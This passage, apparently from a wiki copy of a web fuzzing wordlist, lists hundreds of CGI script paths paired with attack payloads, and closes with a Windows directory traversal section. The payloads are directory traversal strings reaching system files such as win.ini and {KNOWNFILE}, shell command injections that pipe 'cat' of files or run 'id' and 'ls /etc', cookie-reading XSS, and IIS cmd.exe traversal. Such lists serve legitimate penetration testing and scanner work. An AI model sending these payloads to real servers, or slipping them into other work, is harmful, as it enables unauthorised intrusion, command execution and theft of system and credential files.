ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Windows Directory Traversal   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Windows Directory Traversal   (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
